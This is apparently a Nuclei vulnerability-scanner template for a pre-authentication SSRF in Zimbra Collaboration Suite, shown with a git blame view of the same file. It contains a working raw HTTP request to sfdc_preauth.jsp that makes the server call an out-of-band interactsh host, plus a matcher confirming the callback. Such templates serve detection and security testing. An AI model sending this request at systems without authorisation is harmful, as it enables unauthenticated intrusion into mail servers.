nuclei-templates/vulnerabilities/other/zimbra-preauth-ssrf.yaml

id: zimbra-preauth-ssrf

info:
  name: Zimbra Collaboration Suite (ZCS) - SSRF
  author: gy741
  severity: critical
  description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
  reference:
    - https://www.adminxe.com/2183.html
  tags: zimbra,ssrf,oast

requests:
  - raw:
      - |
        GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
Create zimbra-preauth-ssrf.yaml 2021-08-03 07:22:56 +00:00			`id: zimbra-preauth-ssrf`

			`info:`
			`name: Zimbra Collaboration Suite (ZCS) - SSRF`
			`author: gy741`
			`severity: critical`
Add description 2021-10-26 12:23:43 +00:00			`description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.`
Fixed mistakes/typos Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:59:55 +00:00			`reference:`
Create zimbra-preauth-ssrf.yaml 2021-08-03 07:22:56 +00:00			`- https://www.adminxe.com/2183.html`
oob tags update 2021-10-18 20:40:26 +00:00			`tags: zimbra,ssrf,oast`
Create zimbra-preauth-ssrf.yaml 2021-08-03 07:22:56 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`

			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
			`- "http"`